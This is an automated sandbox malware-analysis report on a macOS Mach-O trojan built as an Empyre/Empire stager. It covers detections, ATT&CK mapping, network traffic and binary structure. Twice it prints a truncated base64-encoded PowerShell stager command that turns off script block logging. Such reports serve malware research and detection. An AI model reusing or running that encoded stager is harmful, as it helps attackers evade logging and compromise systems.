Loading ...

Play interactive tourEdit tour

Analysis Report SwWPxGBaKt.macho

Overview

General Information

Sample Name:SwWPxGBaKt.macho
Analysis ID:538
MD5:480e81fbccf44939cf4ad4d21f9ba230
SHA1:ff68dd82ddd872b04b8605adfc7be8f42bb38b0e
SHA256:c364dcfa20543edbe9af0c94bedab5d79002277f97dfcbea3a704e5b4f1088e9
Infos:

Most interesting Screenshot:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Process executable has a file extension which is uncommon (probably to disguise the executable)
Contains symbols with paths

Classification

Startup

  • System is macvm-highsierra
  • SwWPxGBaKt.macho (MD5: 480e81fbccf44939cf4ad4d21f9ba230) Arguments: /Users/berri/Desktop/SwWPxGBaKt.macho
  • cleanup

Yara Overview

No yara matches

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: SwWPxGBaKt.machoAvira: detected
Multi AV Scanner detection for submitted fileShow sources
Source: SwWPxGBaKt.machoVirustotal: Detection: 33%Perma Link
Source: SwWPxGBaKt.machoReversingLabs: Detection: 44%
Source: unknownTCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknownTCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknownTCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.109.202
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.90.177
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.90.177
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.109.202
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmpString found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmpString found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmpString found in binary or memory: http://www.apple.com/certificateauthority0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmpString found in binary or memory: https://www.apple.com/appleca/0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.0000000103002000.0000000103042000.rw-.sdmpString found in binary or memory: https://www.python.org/psf/license/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 443
Source: classification engineClassification label: mal60.evad.macMACHO@0/0@0/0
Source: submission SwWPxGBaKt.machoMach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o
Source: submission SwWPxGBaKt.machoMach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/AppDelegate.o
Source: submission SwWPxGBaKt.machoMach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/
Source: submission SwWPxGBaKt.machoMach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/
Source: submitted sampleStderr: File '<string>'; line 1 wershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbAB1AEUAKAAkAE4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABMAGUAQwB0AGkATwBOAFMALgBHAGUATgBlAHIAaQBjAC4ARABJAGMAVABJAE8ATgBBAHIAWQBbAFMAVABSAEkAbgBnACwAUwBZAHMAVABlAG0ALgBPAEIASgBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABzAEUAewBbAFMAQwBSAGkAUABUAEIATABPAEMAawBdAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAdQBFACgAJABOAFUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwB0ACAAQwBvAGwATABlAEMAVABJAE8AbgBzAC4ARwBFAG4AZQByAGkAQwAuAEgAYQBTAGgAUwBFAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBCAEwAWQAuAEcARQBUAFQAW ^SyntaxError: invalid syntax: exit code = 0

Hooking and other Techniques for Hiding and Protection:

barindex
Process executable has a file extension which is uncommon (probably to disguise the executable)Show sources
Source: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 (PID: 571)Process executable with extension: /Users/berri/Desktop/SwWPxGBaKt.macho
Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionMasquerading1OS Credential DumpingSystem Information Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout

Behavior Graph

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

cam-macmac-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SwWPxGBaKt.macho33%VirustotalBrowse
SwWPxGBaKt.macho45%ReversingLabsMacOS.Trojan.Empr
SwWPxGBaKt.macho100%AviraOSX/Empr.vpkof

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://www.python.org/psf/license/SwWPxGBaKt.macho, 00000571.00000271.9.0000000103002000.0000000103042000.rw-.sdmpfalse
    high

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    17.171.27.65
    unknownUnited States
    714APPLE-ENGINEERINGUSfalse
    17.253.109.202
    unknownUnited States
    6185APPLE-AUSTINUSfalse
    2.22.90.177
    unknownEuropean Union
    20940AKAMAI-ASN1EUfalse

    General Information

    Joe Sandbox Version:31.0.0 Emerald
    Analysis ID:538
    Start date:08.04.2021
    Start time:10:55:14
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 3m 36s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:SwWPxGBaKt.macho
    Cookbook file name:defaultmacfilecookbook.jbs
    Analysis system description:Virtual Machine, High Sierra (Office 2016 v16.16, Java 11.0.2+9, Adobe Reader 2019.010.20099)
    Analysis Mode:default
    Detection:MAL
    Classification:mal60.evad.macMACHO@0/0@0/0
    Warnings:
    Show All
    • Excluded domains from analysis (whitelisted): lb._dns-sd._udp.0.11.168.192.in-addr.arpa

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    AKAMAI-ASN1EUnnrlOwKZlc.exeGet hashmaliciousBrowse
    • 2.20.142.210
    cMOtS8JQVW.exeGet hashmaliciousBrowse
    • 2.20.142.209
    ekdCcEl5KV.exeGet hashmaliciousBrowse
    • 2.20.142.210
    payroll.htmlGet hashmaliciousBrowse
    • 23.0.174.219
    payroll.htmlGet hashmaliciousBrowse
    • 23.0.174.219
    0705UKdp.exeGet hashmaliciousBrowse
    • 104.123.31.226
    Remittance.htmlGet hashmaliciousBrowse
    • 184.31.91.23
    ProcessFreshGet hashmaliciousBrowse
    • 184.31.91.23
    wildix-collaboration-mobile.apkGet hashmaliciousBrowse
    • 104.126.36.152
    wildix-collaboration-mobile.apkGet hashmaliciousBrowse
    • 104.126.36.235
    Curriculo Laura Sperandio.xlsmGet hashmaliciousBrowse
    • 92.122.213.192
    zrmbk.exeGet hashmaliciousBrowse
    • 2.20.142.209
    steam.exeGet hashmaliciousBrowse
    • 92.122.213.232
    pGet hashmaliciousBrowse
    • 95.101.185.4
    xSfGet hashmaliciousBrowse
    • 95.101.185.4
    FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousBrowse
    • 92.123.77.73
    FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousBrowse
    • 2.20.143.38
    equinix-customer-portal.apkGet hashmaliciousBrowse
    • 95.101.20.19
    parler.apkGet hashmaliciousBrowse
    • 95.101.20.11
    mobdro.apkGet hashmaliciousBrowse
    • 2.20.143.13

    JA3 Fingerprints

    No context

    Dropped Files

    No context


    Runtime Messages

    Command:/Users/berri/Desktop/SwWPxGBaKt.macho
    Exit Code:0
    Exit Code Info:
    Killed:False
    Standard Output:

    Standard Error:File '<string>'; line 1
    wershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbAB1AEUAKAAkAE4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABMAGUAQwB0AGkATwBOAFMALgBHAGUATgBlAHIAaQBjAC4ARABJAGMAVABJAE8ATgBBAHIAWQBbAFMAVABSAEkAbgBnACwAUwBZAHMAVABlAG0ALgBPAEIASgBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABzAEUAewBbAFMAQwBSAGkAUABUAEIATABPAEMAawBdAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAdQBFACgAJABOAFUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwB0ACAAQwBvAGwATABlAEMAVABJAE8AbgBzAC4ARwBFAG4AZQByAGkAQwAuAEgAYQBTAGgAUwBFAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBCAEwAWQAuAEcARQBUAFQAW
    ^
    SyntaxError: invalid syntax

    Created / dropped Files

    No created / dropped files found

    Static File Info

    General

    File type:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|PIE>
    Entropy (8bit):3.354292401855357
    TrID:
    • Mac OS X Mach-O 64bit Intel executable (20004/1) 100.00%
    File name:SwWPxGBaKt.macho
    File size:25104
    MD5:480e81fbccf44939cf4ad4d21f9ba230
    SHA1:ff68dd82ddd872b04b8605adfc7be8f42bb38b0e
    SHA256:c364dcfa20543edbe9af0c94bedab5d79002277f97dfcbea3a704e5b4f1088e9
    SHA512:e914e4dd698df816540b41bbdfa4f342dbc6ebe49e7b2b46e5c8b25fb7b61b4cdcb45b87baec355c3ff3efb30fe6b78dd1037d3616e15dd31d48120e45f0557c
    SSDEEP:384:dWvPTo8CduyVFwZqbOpFZ4wYMj+iOPZf6QTN:dQs8SucCqbqZ4vMHQT
    File Content Preview:....................P..... .........H...__PAGEZERO..............................................................__TEXT................... ............... ......................__text..........__TEXT.........................................................
    Static Mach Info
    General Information for header 1
    Endian:<
    Size:64-bit
    Architecture:x86_64
    Filetype:execute
    Nbr. of load commands:20
    Entry point:0xAA0
    segment_command_64 aggregated: 4
    NameValue
    segname__PAGEZERO
    vmaddr0x0
    vmsize0x100000000
    fileoff0x0
    filesize0x0
    maxprot0x0
    initprot0x0
    nsects0
    flags0x0
    NameValue
    segname__TEXT
    vmaddr0x100000000
    vmsize0x2000
    fileoff0x0
    filesize0x2000
    maxprot0x7
    initprot0x5
    nsects8
    flags0x0
    Datas
    sectnamesegnameaddrsizeoffsetalignreloffnrelocflags
    __text__TEXT0x1000009F00x20C0x9F00x40x000x80000400
    __stubs__TEXT0x100000BFC0x420xBFC0x10x000x80000408
    __stub_helper__TEXT0x100000C400x7E0xC400x20x000x80000400
    __cstring__TEXT0x100000CC00x8BA0xCC00x40x000x2
    __objc_classname__TEXT0x10000157A0x2D0x157A0x00x000x2
    __objc_methname__TEXT0x1000015A70x6260x15A70x00x000x2
    __objc_methtype__TEXT0x100001BCD0x3E90x1BCD0x00x000x2
    __unwind_info__TEXT0x100001FB80x480x1FB80x20x000x0
    NameValue
    segname__DATA
    vmaddr0x100002000
    vmsize0x1000
    fileoff0x2000
    filesize0x1000
    maxprot0x7
    initprot0x3
    nsects10
    flags0x0
    Datas
    sectnamesegnameaddrsizeoffsetalignreloffnrelocflags
    __got__DATA0x1000020000x80x20000x30x000x6
    __nl_symbol_ptr__DATA0x1000020080x100x20080x30x000x6
    __la_symbol_ptr__DATA0x1000020180x580x20180x30x000x7
    __objc_classlist__DATA0x1000020700x80x20700x30x000x10000000
    __objc_protolist__DATA0x1000020780x100x20780x30x000x0
    __objc_imageinfo__DATA0x1000020880x80x20880x20x000x0
    __objc_const__DATA0x1000020900x9400x20900x30x000x0
    __objc_ivar__DATA0x1000029D00x80x29D00x30x000x0
    __objc_data__DATA0x1000029D80x500x29D80x30x000x0
    __data__DATA0x100002A280xB00x2A280x30x000x0
    NameValue
    segname__LINKEDIT
    vmaddr0x100003000
    vmsize0x4000
    fileoff0x3000
    filesize0x3210
    maxprot0x7
    initprot0x1
    nsects0
    flags0x0
    dyld_info_command aggregated: 1
    NameValue
    rebase_off12288
    rebase_size160
    bind_off12448
    bind_size152
    weak_bind_off0
    weak_bind_size0
    lazy_bind_off12600
    lazy_bind_size264
    export_off12864
    export_size128
    symtab_command aggregated: 1
    NameValue
    symoff13008
    nsyms66
    stroff14164
    strsize1328
    dysymtab_command aggregated: 1
    NameValue
    ilocalsym0
    nlocalsym45
    iextdefsym45
    nextdefsym5
    iundefsym50
    nundefsym16
    tocoff0
    ntoc0
    modtaboff0
    nmodtab0
    extrefsymoff0
    nextrefsyms0
    indirectsymoff14064
    nindirectsyms25
    extreloff0
    nextrel0
    locreloff0
    nlocrel0
    dylinker_command aggregated: 1
    NameValue
    name12
    Datas/usr/lib/dyld
    uuid_command aggregated: 1
    NameValue
    uuidb'AQ\x8e\xa1\x17.?\x1c\x82\x08\x884\xdc\x9b\xf4\x8c'
    version_min_command aggregated: 1
    NameValue
    version658176
    sdk658176
    source_version_command aggregated: 1
    NameValue
    version0
    entry_point_command aggregated: 1
    NameValue
    entryoff2720
    stacksize0
    dylib_command aggregated: 4
    NameValue
    name24
    timestampThu Jan 1 01:00:02 1970
    current_version2.7.10
    compatibility_version2.7.0
    Datas/System/Library/Frameworks/Python.framework/Versions/2.7/Python
    NameValue
    name24
    timestampThu Jan 1 01:00:02 1970
    current_version1258.0.0
    compatibility_version300.0.0
    Datas/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
    NameValue
    name24
    timestampThu Jan 1 01:00:02 1970
    current_version228.0.0
    compatibility_version1.0.0
    Datas/usr/lib/libobjc.A.dylib
    NameValue
    name24
    timestampThu Jan 1 01:00:02 1970
    current_version1226.10.1
    compatibility_version1.0.0
    Datas/usr/lib/libSystem.B.dylib
    rpath_command aggregated: 1
    NameValue
    path12
    Datas@executable_path/../Frameworks
    linkedit_data_command aggregated: 3
    NameValue
    dataoff12992
    datasize16
    NameValue
    dataoff13008
    datasize0
    NameValue
    dataoff15504
    datasize9600
    Internal Symbols
    -[AppDelegate .cxx_destruct]
    -[AppDelegate .cxx_destruct]
    -[AppDelegate applicationDidFinishLaunching:]
    -[AppDelegate applicationDidFinishLaunching:]
    -[AppDelegate applicationWillTerminate:]
    -[AppDelegate applicationWillTerminate:]
    -[AppDelegate setWindow:]
    -[AppDelegate setWindow:]
    -[AppDelegate window]
    -[AppDelegate window]
    /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/
    /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/
    /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/AppDelegate.o
    /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o
    AppDelegate.m
    _OBJC_CLASS_$_AppDelegate
    _OBJC_CLASS_$_AppDelegate
    _OBJC_CLASS_$_NSObject
    _OBJC_IVAR_$_AppDelegate._window
    _OBJC_IVAR_$_AppDelegate._window
    _OBJC_METACLASS_$_AppDelegate
    _OBJC_METACLASS_$_AppDelegate
    _OBJC_METACLASS_$_NSObject
    _PyRun_SimpleStringFlags
    _Py_Finalize
    _Py_Initialize
    ___stack_chk_fail
    ___stack_chk_guard
    __mh_execute_header
    __objc_empty_cache
    _activateStager
    _activateStager
    _main
    _main
    _memcpy
    _objc_autoreleaseReturnValue
    _objc_destroyWeak
    _objc_loadWeakRetained
    _objc_storeStrong
    _objc_storeWeak
    _setlocale
    dyld_stub_binder
    main.m
    External symbols
    _PyRun_SimpleStringFlags
    _Py_Finalize
    _Py_Initialize
    ___stack_chk_fail
    _memcpy
    _objc_autoreleaseReturnValue
    _objc_destroyWeak
    _objc_loadWeakRetained
    _objc_storeStrong
    _objc_storeWeak
    _setlocale

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Apr 8, 2021 10:56:08.303731918 CEST49238443192.168.11.1117.171.27.65
    Apr 8, 2021 10:56:08.303963900 CEST49238443192.168.11.1117.171.27.65
    Apr 8, 2021 10:56:08.417180061 CEST4434923817.171.27.65192.168.11.11
    Apr 8, 2021 10:56:08.417249918 CEST4434923817.171.27.65192.168.11.11
    Apr 8, 2021 10:56:08.417785883 CEST49238443192.168.11.1117.171.27.65
    Apr 8, 2021 10:56:32.378993988 CEST4924780192.168.11.1117.253.109.202
    Apr 8, 2021 10:56:32.379209995 CEST4924880192.168.11.112.22.90.177
    Apr 8, 2021 10:56:32.389942884 CEST80492482.22.90.177192.168.11.11
    Apr 8, 2021 10:56:32.390476942 CEST4924880192.168.11.112.22.90.177
    Apr 8, 2021 10:56:32.400599957 CEST804924717.253.109.202192.168.11.11
    Apr 8, 2021 10:56:32.401242018 CEST4924780192.168.11.1117.253.109.202

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Apr 8, 2021 10:56:35.845971107 CEST5732553192.168.11.111.1.1.1
    Apr 8, 2021 10:56:35.852438927 CEST53573251.1.1.1192.168.11.11

    System Behavior

    General

    Start time:10:56:05
    Start date:08/04/2021
    Path:/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
    Arguments:n/a
    File size:3722408 bytes
    MD5 hash:8910349f44a940d8d79318367855b236

    General

    Start time:10:56:05
    Start date:08/04/2021
    Path:/Users/berri/Desktop/SwWPxGBaKt.macho
    Arguments:/Users/berri/Desktop/SwWPxGBaKt.macho
    File size:25104 bytes
    MD5 hash:480e81fbccf44939cf4ad4d21f9ba230